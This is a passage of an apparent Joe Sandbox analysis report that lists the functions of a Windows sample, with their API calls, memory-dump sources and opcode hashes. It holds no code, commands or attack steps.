                                                                      • String ID:
                                                                      • API String ID: 3659485706-0
                                                                      • Opcode ID: 3003efefbd41906f702a8c0b0ed1882f07f4b0a7962c2a4b177f25d440244d13
                                                                      • Instruction ID: 5a86fc2b4d4eb4ab969c840d239b050702aa33da22dc7311a434b9f89c52a85a
                                                                      • Opcode Fuzzy Hash: 3003efefbd41906f702a8c0b0ed1882f07f4b0a7962c2a4b177f25d440244d13
                                                                      • Instruction Fuzzy Hash: 62C147716083019FC704EF28C495A6ABBF4FF89714F04896DF89A9B351D731E946CB82
                                                                      Function 00588093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 005880C3
                                                                      • CoUninitialize.OLE32 ref: 005880CE
                                                                        • Part of subcall function 0056D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0056D5D4
                                                                      • VariantInit.OLEAUT32(?), ref: 005880D9
                                                                      • VariantClear.OLEAUT32(?), ref: 005883AA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                      • String ID:
                                                                      • API String ID: 780911581-0
                                                                      • Opcode ID: 928a294d015874d7110a58b671024556719d6de003db1664dd35d75cff462d3d
                                                                      • Instruction ID: d25ab53b845eaf59c531254fa85ada4cf430255d9cc798fcfb9531b4fb07be9f
                                                                      • Opcode Fuzzy Hash: 928a294d015874d7110a58b671024556719d6de003db1664dd35d75cff462d3d
                                                                      • Instruction Fuzzy Hash: 0EA16B356047029FDB10EF14C895B6ABBE4FF89714F544858F996AB3A1CB30ED45CB82
                                                                      Function 0056687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$AllocClearCopyInitString
                                                                      • String ID:
                                                                      • API String ID: 2808897238-0
                                                                      • Opcode ID: 035e6db40586c1b04eb658ae6695d2447a8bdee217e5072e9c4e48a46cbf4eb5
                                                                      • Instruction ID: 444e691aa9a21eae7b15cbac171cf9fa530e67bb7dfc028056e3042253d70d57
                                                                      • Opcode Fuzzy Hash: 035e6db40586c1b04eb658ae6695d2447a8bdee217e5072e9c4e48a46cbf4eb5
                                                                      • Instruction Fuzzy Hash: EC518274704302DADF24AFA5D8A5A6ABBE5BF85310F20DC1FE596DB291DE74E880C701
                                                                      Function 005997F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowRect.USER32(0100D820,?), ref: 00599863
                                                                      • ScreenToClient.USER32(00000002,00000002), ref: 00599896
                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00599903
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientMoveRectScreen
                                                                      • String ID:
                                                                      • API String ID: 3880355969-0
                                                                      • Opcode ID: ad796aaa41477165f8dca726498ea24d1a111b6a13673383c130bbc2583b45dd
                                                                      • Instruction ID: 7559ac1a8653c5ec6bc607a469e8f03b9b9d0186d9aaa6001a8a3cee2b6508dc
                                                                      • Opcode Fuzzy Hash: ad796aaa41477165f8dca726498ea24d1a111b6a13673383c130bbc2583b45dd
                                                                      • Instruction Fuzzy Hash: 06514F34A01209EFDF20CF68D984AAE7BB5FF55360F24815EF9559B2A0D730AD81DB90
                                                                      Function 00569A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00569AD2
                                                                      • __itow.LIBCMT ref: 00569B03
                                                                        • Part of subcall function 00569D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00569DBE
                                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00569B6C
                                                                      • __itow.LIBCMT ref: 00569BC3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$__itow
                                                                      • String ID:
                                                                      • API String ID: 3379773720-0
                                                                      • Opcode ID: c348ea97c0f7e9a107d30a2e4a4c6a58796c89baa02ee1caef3a7fca1cd4ccde
                                                                      • Instruction ID: 206d9b50559fe85f9b0195d5112d53ec6294114c7f5bb768d1a323447c4d4439
                                                                      • Opcode Fuzzy Hash: c348ea97c0f7e9a107d30a2e4a4c6a58796c89baa02ee1caef3a7fca1cd4ccde
                                                                      • Instruction Fuzzy Hash: 52414F74A0420DABDF11DF54D849BEE7FB9FF88714F000069F905A72A1DB749984CB91
                                                                      Function 005869AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 005869D1
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 005869E1
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00586A45
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00586A51
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$__itow__swprintfsocket
                                                                      • String ID:
                                                                      • API String ID: 2214342067-0
                                                                      • Opcode ID: 07d8a50b056f28e55cb1ca1e3c47014ccbab03431b6f7abfc54f577cbef7d165
                                                                      • Instruction ID: 0c8550b6cd3c89014c5bf9373784a6087e7f0f89b4f0eb810790fff96f4ae314
                                                                      • Opcode Fuzzy Hash: 07d8a50b056f28e55cb1ca1e3c47014ccbab03431b6f7abfc54f577cbef7d165
                                                                      • Instruction Fuzzy Hash: C1419275640201AFEB60BF24DC9AFB97BA4AF54B14F448418FA19AF3C2DA709D418791
                                                                      Function 0058641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0059F910), ref: 005864A7
                                                                      • _strlen.LIBCMT ref: 005864D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _strlen
                                                                      • String ID:
                                                                      • API String ID: 4218353326-0
                                                                      • Opcode ID: 39ec7972ffb0f51e9678b51186f956c1d60c8aad34a11e6c170270b7ecaa587c
                                                                      • Instruction ID: 1f13fbfdb651201bebf54fa7c7b789f1cc3969c30740fb1e0b8a763c3ca86d3f
                                                                      • Opcode Fuzzy Hash: 39ec7972ffb0f51e9678b51186f956c1d60c8aad34a11e6c170270b7ecaa587c
                                                                      • Instruction Fuzzy Hash: D5419631A04105ABDB14FB64DC99EEEBFA9BF94310F548155FC15A7292EB30EE44C750
                                                                      Function 0057B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0057B89E
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0057B8C4
                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0057B8E9
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0057B915
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 3321077145-0
                                                                      • Opcode ID: a9e814ad540dbed0576d33ea6474f594c19ebcbce0d0b92c9edab3a2ca8f7812
                                                                      • Instruction ID: e76d40fff7a84699f2e4355f892d5043298a38df215d0edc54cd64684a5d590c
                                                                      • Opcode Fuzzy Hash: a9e814ad540dbed0576d33ea6474f594c19ebcbce0d0b92c9edab3a2ca8f7812
                                                                      • Instruction Fuzzy Hash: B3411939600511EFDB10EF15C498A99BBE1BF8A310F19C099ED4A9B362CB30FD41DB91
                                                                      Function 00598851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005988DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: InvalidateRect
                                                                      • String ID:
                                                                      • API String ID: 634782764-0
                                                                      • Opcode ID: 4702f4751543a7f1f14cb92fead1d38fd5bd5c3c927bd90eccf3823e399f3a3a
                                                                      • Instruction ID: 68b2986d61dfc09e194d855aa7e4cd4be27b285d4b7616326d7ebfe4a32ea5bd
                                                                      • Opcode Fuzzy Hash: 4702f4751543a7f1f14cb92fead1d38fd5bd5c3c927bd90eccf3823e399f3a3a
                                                                      • Instruction Fuzzy Hash: 0931B034601109AFEF209F68CC45FB87FA5FB07350FA44916FA15E62A1CF70E944AB52
                                                                      Function 0059AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ClientToScreen.USER32(?,?), ref: 0059AB60
                                                                      • GetWindowRect.USER32(?,?), ref: 0059ABD6
                                                                      • PtInRect.USER32(?,?,0059C014), ref: 0059ABE6
                                                                      • MessageBeep.USER32(00000000), ref: 0059AC57
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1352109105-0
                                                                      • Opcode ID: b48c00975201b39b411b18b31075bd30fdcd1dad01a497d704a9c75eff45b5f5
                                                                      • Instruction ID: ae266df9105aa197ba017c20a10f0af7b8e90b10e12d154b2d94f14ec2378093
                                                                      • Opcode Fuzzy Hash: b48c00975201b39b411b18b31075bd30fdcd1dad01a497d704a9c75eff45b5f5
                                                                      • Instruction Fuzzy Hash: 05415E306001199FCF21DF58D884A597BF6FB59310F2884AAF915DF264E730EC45EBA2
                                                                      Function 00570AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00570B27
                                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00570B43
                                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00570BA9
                                                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00570BFB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: f11050ff653ef2b4cfbaaed7e430262845e959d876268b9eaf7111ec2f4ac8b9
                                                                      • Instruction ID: 8afc0c75ef21b787102b7569badf5126ea0f9cec572bc88fdd567aa949f9f2c6
                                                                      • Opcode Fuzzy Hash: f11050ff653ef2b4cfbaaed7e430262845e959d876268b9eaf7111ec2f4ac8b9
                                                                      • Instruction Fuzzy Hash: 01312670D40218EEFF308A25AC09BFEBFEABB85318F04D25AE48C921D1C3748A44B751
                                                                      Function 00570C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00570C66
                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00570C82
                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00570CE1
                                                                      • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00570D33
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: 791a2444bba7ca610279b73575928d90790dbb80a6bb497906fe08a4f320d145
                                                                      • Instruction ID: 488dafebc4e79d479ad24cccd1cf356a2df6a9d6685f4e953d8f7f6f1560b5fd
                                                                      • Opcode Fuzzy Hash: 791a2444bba7ca610279b73575928d90790dbb80a6bb497906fe08a4f320d145
                                                                      • Instruction Fuzzy Hash: B3313530940318EEFF318A69A8097FEFFEABB85310F04D76AE488921D1C3759D45A751
                                                                      Function 005461C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 005461FB
                                                                      • __isleadbyte_l.LIBCMT ref: 00546229
                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00546257
                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0054628D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                      • String ID:
                                                                      • API String ID: 3058430110-0
                                                                      • Opcode ID: 8a2a5863fbe88c3f5206f6e41fe5ecb46e5859c6c70d7eaebe80355448baa49c
                                                                      • Instruction ID: 1979c6f9e7a963b1d3361bd17516cd527cadffbac2d25b44b38dd7f4b26694d2
                                                                      • Opcode Fuzzy Hash: 8a2a5863fbe88c3f5206f6e41fe5ecb46e5859c6c70d7eaebe80355448baa49c
                                                                      • Instruction Fuzzy Hash: 4931DE34608246BFDF218F64CC48BFA7FA9FF82318F154429E824971A1E770E950DB92
                                                                      Function 00594EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 00594F02
                                                                        • Part of subcall function 00573641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0057365B
                                                                        • Part of subcall function 00573641: GetCurrentThreadId.KERNEL32 ref: 00573662
                                                                        • Part of subcall function 00573641: AttachThreadInput.USER32(00000000,?,00575005), ref: 00573669
                                                                      • GetCaretPos.USER32(?), ref: 00594F13
                                                                      • ClientToScreen.USER32(00000000,?), ref: 00594F4E
                                                                      • GetForegroundWindow.USER32 ref: 00594F54
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                      • String ID:
                                                                      • API String ID: 2759813231-0
                                                                      • Opcode ID: a92d0dfc76f85ff6cca1e944b5fe127ad47d99e735ad2e25ef6de50756f8b102
                                                                      • Instruction ID: 1ccb89014b62f9a883043908b3a395c3e6a578c1b7a04adf687e48472565b064
                                                                      • Opcode Fuzzy Hash: a92d0dfc76f85ff6cca1e944b5fe127ad47d99e735ad2e25ef6de50756f8b102
                                                                      • Instruction Fuzzy Hash: 03310C71D00109AFDB10EFA5C8899EFBBFDFF99300B11446AE415E7241DA719E458BA0
                                                                      Function 0059C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00512612: GetWindowLongW.USER32(?,000000EB), ref: 00512623
                                                                      • GetCursorPos.USER32(?), ref: 0059C4D2
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0054B9AB,?,?,?,?,?), ref: 0059C4E7
                                                                      • GetCursorPos.USER32(?), ref: 0059C534
                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0054B9AB,?,?,?), ref: 0059C56E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                      • String ID:
                                                                      • API String ID: 2864067406-0
                                                                      • Opcode ID: 8c1de573ca73ec49bfca61355fa559bd5641963e376d6486ae6577f77a9de0d0
                                                                      • Instruction ID: 2ad6ad9d42db463d077a08480f321373159f677970d0521dfe455b51a935bbdc
                                                                      • Opcode Fuzzy Hash: 8c1de573ca73ec49bfca61355fa559bd5641963e376d6486ae6577f77a9de0d0
                                                                      • Instruction Fuzzy Hash: DA31A035600058AFCF25CF58C898EEA7FB9FB4A311F55406AF9058B261C731AD60EBA4
                                                                      Function 00568656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0056810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00568121
                                                                        • Part of subcall function 0056810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0056812B
                                                                        • Part of subcall function 0056810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0056813A
                                                                        • Part of subcall function 0056810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00568141
                                                                        • Part of subcall function 0056810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00568157
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005686A3
                                                                      • _memcmp.LIBCMT ref: 005686C6
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005686FC
                                                                      • HeapFree.KERNEL32(00000000), ref: 00568703
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                      • String ID:
                                                                      • API String ID: 1592001646-0
                                                                      • Opcode ID: f42c9921eaffec9b3db4767562394c3833935ddb1cd0f87e92f3f11f49da3c52
